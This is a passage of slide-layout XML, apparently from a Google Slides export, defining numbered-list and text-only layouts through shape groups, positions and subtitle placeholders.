            <a:off x="457200" y="2419975"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1240" name="Google Shape;1240;p71"/>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241" name="Google Shape;1241;p71"/>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2" name="Google Shape;1242;p71"/>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43" name="Google Shape;1243;p71"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3011050"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1244" name="Google Shape;1244;p71"/>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245" name="Google Shape;1245;p71"/>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6" name="Google Shape;1246;p71"/>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47" name="Google Shape;1247;p71"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3602137"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1248" name="Google Shape;1248;p71"/>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1249" name="Google Shape;1249;p71"/>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0" name="Google Shape;1250;p71"/>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1" name="Google Shape;1251;p71"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="4193262"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1252" name="Google Shape;1252;p71"/>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1253" name="Google Shape;1253;p71"/>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4" name="Google Shape;1254;p71"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12075" y="18488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55" name="Google Shape;1255;p71"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12075" y="24399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56" name="Google Shape;1256;p71"/>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57" name="Google Shape;1257;p71"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12475" y="3622088"/>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58" name="Google Shape;1258;p71"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12475" y="4236125"/>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7. Text Only">
  <p:cSld name="CUSTOM_2_7_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 58"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Google Shape;59;p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 name="Google Shape;60;p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1" name="Google Shape;61;p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2" name="Google Shape;62;p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3" name="Google Shape;63;p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4" name="Google Shape;64;p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 name="Google Shape;65;p8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="175" y="1284250"/>
            <a:ext cx="9144000" cy="3622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20. Numbered 1–6 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1259"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1260" name="Google Shape;1260;p72"/>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7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62" name="Google Shape;1262;p7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263" name="Google Shape;1263;p7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264" name="Google Shape;1264;p7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265" name="Google Shape;1265;p7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266" name="Google Shape;1266;p7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267" name="Google Shape;1267;p72"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1237825"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1268" name="Google Shape;1268;p72"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1466425"/>
              <a:ext cx="695400" cy="486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1269" name="Google Shape;1269;p72"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="973100" y="1624950"/>
              <a:ext cx="33337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70" name="Google Shape;1270;p72"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12225" y="12746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71" name="Google Shape;1271;p72"/>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72" name="Google Shape;1272;p72"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1828900"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1273" name="Google Shape;1273;p72"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1466425"/>
              <a:ext cx="695400" cy="486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1274" name="Google Shape;1274;p72"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="973100" y="1624950"/>
              <a:ext cx="33337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75" name="Google Shape;1275;p72"/>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76" name="Google Shape;1276;p72"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2419975"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1277" name="Google Shape;1277;p72"/>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278" name="Google Shape;1278;p72"/>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79" name="Google Shape;1279;p72"/>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80" name="Google Shape;1280;p72"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3011050"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1281" name="Google Shape;1281;p72"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1466425"/>
              <a:ext cx="695400" cy="486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282" name="Google Shape;1282;p72"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="973100" y="1624950"/>
              <a:ext cx="33337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83" name="Google Shape;1283;p72"/>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84" name="Google Shape;1284;p72"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3602137"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1285" name="Google Shape;1285;p72"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1466425"/>
              <a:ext cx="695400" cy="486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1286" name="Google Shape;1286;p72"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="973100" y="1624950"/>
              <a:ext cx="33337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87" name="Google Shape;1287;p72"/>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88" name="Google Shape;1288;p72"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="4193262"/>
            <a:ext cx="776900" cy="486300"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1289" name="Google Shape;1289;p72"/>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1290" name="Google Shape;1290;p72"/>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91" name="Google Shape;1291;p72"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1858813"/>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92" name="Google Shape;1292;p72"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12250" y="2439925"/>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93" name="Google Shape;1293;p72"/>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94" name="Google Shape;1294;p72"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12125" y="362210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95" name="Google Shape;1295;p72"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12150" y="42361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21. Numbered 1–7 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1296"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1297" name="Google Shape;1297;p73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254500" y="11616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7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99" name="Google Shape;1299;p7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300" name="Google Shape;1300;p7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301" name="Google Shape;1301;p7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302" name="Google Shape;1302;p7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303" name="Google Shape;1303;p7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304" name="Google Shape;1304;p73"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457222" y="1149803"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1305" name="Google Shape;1305;p7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1306" name="Google Shape;1306;p7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07" name="Google Shape;1307;p73"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="11753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08" name="Google Shape;1308;p73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254500" y="16842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09" name="Google Shape;1309;p73"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457222" y="1672428"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1310" name="Google Shape;1310;p7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1311" name="Google Shape;1311;p7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12" name="Google Shape;1312;p73"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="125" y="16979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13" name="Google Shape;1313;p73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254475" y="220740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14" name="Google Shape;1314;p73"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457197" y="2195578"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1315" name="Google Shape;1315;p7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1316" name="Google Shape;1316;p7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17" name="Google Shape;1317;p73"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="222110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18" name="Google Shape;1318;p73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254475" y="27300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19" name="Google Shape;1319;p73"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457197" y="2718203"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1320" name="Google Shape;1320;p7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1321" name="Google Shape;1321;p7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22" name="Google Shape;1322;p73"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-125" y="27437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23" name="Google Shape;1323;p73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254500" y="32526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24" name="Google Shape;1324;p73"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457222" y="3240828"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1325" name="Google Shape;1325;p7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1326" name="Google Shape;1326;p7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27" name="Google Shape;1327;p73"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25" y="32663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28" name="Google Shape;1328;p73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254500" y="377527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29" name="Google Shape;1329;p73"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457222" y="3763453"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1330" name="Google Shape;1330;p7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1331" name="Google Shape;1331;p7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32" name="Google Shape;1332;p73"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-50" y="378897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33" name="Google Shape;1333;p73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1254500" y="43234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34" name="Google Shape;1334;p73"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457222" y="4311603"/>
            <a:ext cx="713194" cy="446423"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1335" name="Google Shape;1335;p7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1336" name="Google Shape;1336;p7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37" name="Google Shape;1337;p73"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25" y="43371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22. Numbered 1–8 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1338"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1339" name="Google Shape;1339;p7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40" name="Google Shape;1340;p7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341" name="Google Shape;1341;p7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342" name="Google Shape;1342;p7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343" name="Google Shape;1343;p7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344" name="Google Shape;1344;p7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45" name="Google Shape;1345;p74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179113" y="387300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46" name="Google Shape;1346;p74"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457427" y="3873038"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1347" name="Google Shape;1347;p7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1348" name="Google Shape;1348;p7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49" name="Google Shape;1349;p74"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12100" y="3873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50" name="Google Shape;1350;p74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179000" y="431111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51" name="Google Shape;1351;p74"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457315" y="4311142"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1352" name="Google Shape;1352;p7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1353" name="Google Shape;1353;p7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54" name="Google Shape;1354;p74"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12075" y="43112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55" name="Google Shape;1355;p74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179063" y="299663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56" name="Google Shape;1356;p74"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457377" y="2996663"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1357" name="Google Shape;1357;p7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1358" name="Google Shape;1358;p7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59" name="Google Shape;1359;p74"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12150" y="29967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60" name="Google Shape;1360;p74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1178950" y="343473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61" name="Google Shape;1361;p74"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457265" y="3434767"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1362" name="Google Shape;1362;p7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1363" name="Google Shape;1363;p7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64" name="Google Shape;1364;p74"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12150" y="34348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65" name="Google Shape;1365;p74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179088" y="213525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66" name="Google Shape;1366;p74"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457402" y="2135288"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1367" name="Google Shape;1367;p7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1368" name="Google Shape;1368;p7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69" name="Google Shape;1369;p74"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12125" y="21353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70" name="Google Shape;1370;p74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1178975" y="257336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71" name="Google Shape;1371;p74"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457290" y="2573392"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1372" name="Google Shape;1372;p7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1373" name="Google Shape;1373;p7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74" name="Google Shape;1374;p74"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12250" y="25735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75" name="Google Shape;1375;p74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179038" y="125888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76" name="Google Shape;1376;p74"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457352" y="1258913"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1377" name="Google Shape;1377;p7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1378" name="Google Shape;1378;p7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79" name="Google Shape;1379;p74"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="12590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80" name="Google Shape;1380;p74"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1178925" y="169698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81" name="Google Shape;1381;p74"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457240" y="1697017"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1382" name="Google Shape;1382;p7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1383" name="Google Shape;1383;p7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84" name="Google Shape;1384;p74"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="1697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23. Numbered 1–8 (Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 1385"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1386" name="Google Shape;1386;p7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87" name="Google Shape;1387;p7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388" name="Google Shape;1388;p7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389" name="Google Shape;1389;p7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390" name="Google Shape;1390;p7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391" name="Google Shape;1391;p7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92" name="Google Shape;1392;p75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1179113" y="387300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93" name="Google Shape;1393;p75"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457427" y="3873038"/>
            <a:ext cx="602564" cy="377174"/>
            <a:chOff x="457200" y="1466425"/>
            <a:chExt cx="776900" cy="486300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1394" name="Google Shape;1394;p75"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1466425"/>
              <a:ext cx="695400" cy="486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1395" name="Google Shape;1395;p75"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="973100" y="1624950"/>
              <a:ext cx="33337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96" name="Google Shape;1396;p75"/>
          <p:cNvSpPr txBox="1">
